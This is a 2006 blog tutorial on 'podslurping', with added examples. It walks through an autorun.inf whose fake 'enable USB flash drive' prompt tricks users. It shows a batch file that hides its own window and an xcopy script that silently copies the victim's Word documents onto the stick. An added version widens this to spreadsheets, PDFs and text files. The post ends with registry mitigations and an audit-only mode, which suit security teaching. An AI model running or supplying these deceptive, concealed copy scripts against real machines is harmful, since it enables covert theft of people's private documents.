How to: Simple “Podslurping” Example With a USB Flash Drive

There has been a lot of talk about “Podslurping” as a new endpoint security threat. Podslurping is the use of a removable storage device, such as an iPod (hence the name), to copy documents off a computer onto the device. Abe Usher introduced the concept a while back and developed a proof of concept, along with a second, audit-only version that copied nothing and simply produced a list of the documents the application could have copied.

But really, all podslurping involves is copying files from one place to another. You do not need to develop any special application to do that: Windows has the tools built right in, so a simple batch file around xcopy is enough. Let’s build on the autorun tutorial from last week and create an autorun.inf file that calls a couple of batch files.

First create an autorun.inf file that looks like this:

[autorun]
icon=lilguy.ico
open=start.bat
action=Click "OK" to enable USB flash drive
shell\open\command=start.bat

So we use the autorun tricks we learned last week both to prompt the user to run the application (the action and open lines) and to run it automatically when the drive is double-clicked in Explorer (the shell\open\command line). In an actual attack, where a malicious user is trying to steal information from a system, they would probably take advantage of the U3 autorun hack, where the flash drive presents part of itself as a CD-ROM so the autorun fires with no prompt at all, but since we are just showing a proof of concept we don’t need this.

You will notice that the autorun.inf executes start.bat. I use this file to do two things: launch the batch file that holds the actual slurping commands, and hide the command prompt by starting that file minimized, which helps conceal exactly what I am doing:

@echo off
rem Launch the copying script in its own minimized window, then close this one.
rem start's options go before the command name; /min minimizes the new window.
start /min slurp.bat
exit

Next we create the script that actually copies the files. For this example, imagine that I just want to copy all Word documents from the target user’s “My Documents” directory:

@echo off
rem %~d0 is the drive letter of the drive this script runs from, i.e. the flash drive;
rem the directory on it is named after the target machine.
mkdir "%~d0\%computername%"
rem Copy every .doc under My Documents, keeping the subdirectory tree:
rem /s subdirectories, /c continue on errors, /q quiet, /r overwrite read-only,
rem /h include hidden and system files, /y never prompt about overwriting (repeat runs).
xcopy "C:\Documents and Settings\%username%\My Documents\*.doc" "%~d0\%computername%" /s /c /q /r /h /y
cls
exit

First I create a directory on my USB flash drive. “%~d0” is not a fixed variable but the drive-letter expansion of %0, the script’s own path, so it yields whatever drive the script is currently running from, no matter which letter the stick was given. I name the directory after the computer’s name, just in case I am auditing multiple systems with the same stick. The xcopy command then copies any file with a “.doc” extension it finds, descending into subdirectories and recreating them under the destination in the same tree as the original “My Documents” directory. Note that the hard-coded “C:\Documents and Settings\%username%” path assumes a Windows XP profile on C:; “%userprofile%” would find the profile wherever it actually lives.
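As an added example, not code from the original post, here is a slurp.bat that generalizes the one above: it takes several document types, writes a manifest of what it did onto the stick, and accepts an audit argument that only lists the files it would have copied, in the spirit of the audit-only version mentioned at the top. The extension list, the manifest file name and the audit switch are my assumptions, not anything from the post; it uses %userprofile% instead of the hard-coded Documents and Settings path so it also works when the profile is not on C:.

```batch
@echo off
setlocal
rem Generalized slurp.bat, added example. Usage:
rem   slurp.bat          copy matching documents to the stick
rem   slurp.bat audit    only list what would be copied, copy nothing
set "MODE=%~1"

rem Destination lives on the drive this script runs from, one folder per host.
set "DEST=%~d0\%computername%"
set "LOG=%DEST%\manifest.txt"

rem %userprofile% resolves the profile even when it is not under C:\Documents and Settings.
set "SRC=%userprofile%\My Documents"

rem Extensions to look for, as bare names so the for loop does not glob the current directory.
rem Assumption: adjust to what you are after.
set "TYPES=doc xls ppt pdf txt"

if not exist "%DEST%" mkdir "%DEST%"
echo %date% %time% host=%computername% user=%username% mode=%MODE% > "%LOG%"

for %%T in (%TYPES%) do (
    if /i "%MODE%"=="audit" (
        rem Audit only: record the full path of every match, recursively.
        dir /s /b /a-d "%SRC%\*.%%T" >> "%LOG%" 2>nul
    ) else (
        rem /s subdirectories, /c continue on errors, /r overwrite read-only,
        rem /h hidden and system files, /y no overwrite prompts, /i destination is a directory.
        rem Without /q, xcopy writes each copied path into the manifest.
        xcopy "%SRC%\*.%%T" "%DEST%" /s /c /r /h /y /i >> "%LOG%" 2>nul
    )
)
endlocal
```

Running it as "slurp.bat audit" from the stick leaves the target untouched and gives you the list of paths that a copy run would have taken, which is the safer thing to carry out of an assessment.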

This is just a quick example of podslurping and of how simple it really is. There are more malicious podslurping tools out there which do a better job of searching for specific files of value, hide themselves better, and even run in the background from startup, not just loading files onto a USB flash drive but actually sending them offsite via email, FTP or even VNC. Keep in mind that the copy step above depends on two things the host controls: Autorun being allowed to act on the stick, and the stick being writable at all.
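For the defender’s side, as an added example that is not part of the original post, the following script applies the host-side settings that break the slurp demonstrated above: it turns Autorun off for all drive types, stops Explorer from honouring an autorun.inf on a double-click, and makes USB mass storage read-only so the xcopy onto the stick fails. The registry paths and values are the standard Windows ones; the grouping and comments are mine. It must run from an administrator account, and the write-protect policy applies to devices plugged in after the change.

```batch
@echo off
rem Added example: host-side mitigations for a USB podslurp. Run as administrator;
rem all three values are machine-wide.

rem 1. Disable Autorun for every drive type (0xFF = 255), so the autorun.inf prompt never appears.
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f

rem 2. Explorer still honours shell\open\command on a double-click even with Autorun off.
rem    Mapping autorun.inf to a non-existent key makes Explorer ignore the file entirely.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /ve /t REG_SZ /d "@SYS:DoesNotExist" /f

rem 3. Make USB mass storage read-only (XP SP2 and later): the stick can still be read,
rem    but writes to it fail, which is what defeats the copy itself.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies" /v WriteProtect /t REG_DWORD /d 1 /f

rem Show the resulting values so the change can be verified.
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /ve
reg query "HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies" /v WriteProtect
```

None of this stops a tool that ships the files out over the network, or a device that presents itself as something other than mass storage (the U3 CD-ROM trick is one case), so treat it as the minimum, not the whole answer.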

posted by akuma @ October 29, 2006 11:36 pm